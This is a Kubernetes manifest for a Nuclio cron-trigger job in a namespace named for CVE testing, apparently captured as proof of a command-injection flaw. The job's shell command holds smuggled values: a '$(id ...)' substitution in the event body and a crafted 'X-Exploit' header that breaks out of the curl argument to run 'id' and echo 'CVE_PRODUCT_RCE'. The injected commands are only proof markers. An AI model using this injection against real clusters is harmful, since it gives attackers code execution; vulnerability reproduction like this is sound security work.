{
  "apiVersion": "v1",
  "items": [
    {
      "apiVersion": "batch/v1",
      "kind": "CronJob",
      "metadata": {
        "creationTimestamp": "2026-07-09T21:15:13Z",
        "generation": 1,
        "labels": {
          "nuclio.io/app": "functionres",
          "nuclio.io/class": "function",
          "nuclio.io/component": "cron-trigger",
          "nuclio.io/function-cron-trigger-name": "cron",
          "nuclio.io/function-name": "vulncron",
          "nuclio.io/function-version": "latest",
          "nuclio.io/project-name": "cve-project"
        },
        "name": "nuclio-cron-job-d980uof180khnc4ueqk0",
        "namespace": "nuclio-cve",
        "resourceVersion": "513",
        "uid": "d295d021-4a44-4ded-95f1-9720e2b76604"
      },
      "spec": {
        "concurrencyPolicy": "Forbid",
        "failedJobsHistoryLimit": 1,
        "jobTemplate": {
          "metadata": {
            "creationTimestamp": null
          },
          "spec": {
            "backoffLimit": 2,
            "template": {
              "metadata": {
                "creationTimestamp": null,
                "labels": {
                  "nuclio.io/app": "functionres",
                  "nuclio.io/class": "function",
                  "nuclio.io/function-cron-job-pod": "true",
                  "nuclio.io/function-name": "vulncron",
                  "nuclio.io/function-version": "latest",
                  "nuclio.io/project-name": "cve-project"
                }
              },
              "spec": {
                "containers": [
                  {
                    "args": [
                      "/bin/sh",
                      "-c",
                      "echo \"$(id 1>&2; echo BODY_PROOF)\" > /tmp/eventbody.out && curl --silent  --header \"X-Exploit\"; echo CVE_PRODUCT_RCE; id; echo \": marker\" --header \"X-Nuclio-Invoke-Trigger: cron\" --header \"X-Nuclio-Target: vulncron\" nuclio-vulncron.nuclio-cve.svc.cluster.local:8080 --retry 10 --retry-delay 1 --retry-max-time 10 --retry-connrefused --data '@/tmp/eventbody.out'"
                    ],
                    "image": "curlimages/curl:8.11.1",
                    "imagePullPolicy": "IfNotPresent",
                    "name": "function-invocator",
                    "resources": {
                      "requests": {
                        "cpu": "25m",
                        "memory": "1Mi"
                      }
                    },
                    "terminationMessagePath": "/dev/termination-log",
                    "terminationMessagePolicy": "File"
                  }
                ],
                "dnsPolicy": "ClusterFirst",
                "restartPolicy": "Never",
                "schedulerName": "default-scheduler",
                "securityContext": {},
                "terminationGracePeriodSeconds": 30
              }
            }
          }
        },
        "schedule": "@every 1m",
        "successfulJobsHistoryLimit": 1,
        "suspend": false
      },
      "status": {}
    }
  ],
  "kind": "List",
  "metadata": {
    "resourceVersion": ""
  }
}
